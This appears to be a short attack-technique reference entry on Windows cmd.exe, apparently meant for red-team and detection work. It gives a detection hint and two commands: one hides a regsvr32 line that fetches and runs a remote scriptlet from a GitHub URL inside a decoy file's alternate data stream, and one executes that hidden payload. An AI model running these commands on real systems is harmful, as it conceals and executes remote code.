The command-line interpreter in Windows

Paths:

C:\Windows\System32\cmd.exe
C:\Windows\SysWOW64\cmd.exe

Detection: cmd.exe executing files from alternate data streams.

Alternate data streams

Add content to an Alternate Data Stream (ADS).

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat

Execute payload.bat stored in an Alternate Data Stream (ADS).

cmd.exe - < fakefile.doc:payload.bat